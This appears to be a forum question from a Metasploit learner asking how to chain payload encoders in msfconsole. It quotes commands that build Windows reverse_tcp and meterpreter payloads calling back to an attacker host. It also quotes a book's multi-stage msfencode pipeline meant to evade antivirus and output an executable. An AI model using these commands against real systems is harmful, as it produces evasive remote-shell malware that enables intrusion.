I am new to metasploit and i am trying to learn this amazing tool. i am reading a book on it and im at a part where it talks about encoding the payloads to avoid Antivirus softwares. I am kinda confused if i HAVE to use msfcli to perform multiple encodings or if i can just use msfconsole. i prefer using msfconsole right now because i can press tab to get suggestions when typing paths and stuff. this is what im doing to encode the payload:
msf> use payload/windows/shell/reverse_tcp
msf > set LHOST .... and set LPORT ...
msf>generate -f payload.exe -t exe -e x86/shikata_ga_nai
Book uses the following code for multi encoding:
root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5
-t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /var/www/payload3.exe
book uses version 3.7 of metasploit and im using version 4.2.
1. is generate command in msfconsole equivalent to msfpayload/msfencode in msfcli?
2. how do i write the code used by the book for multiple encodings (shown above) using the generate command in msfconsole? i could only figure out using the -e switch with the generate command in msfconsole which is good for only 1 encoding. how can i use multiple encodings?
3. where do i find the path used by the use command (bolded above) payload/windows/shell/reverse_tcp? I checked my local directory structure and i only see /opt/framework/msf3/modules/payloads/stagers/windows/reverse_tcp.rb. I am not sure how the reverse_tcp is being loaded even though the paths to reverse_tcp is completely different
any help would be greatly appreciated.
thanks in advance.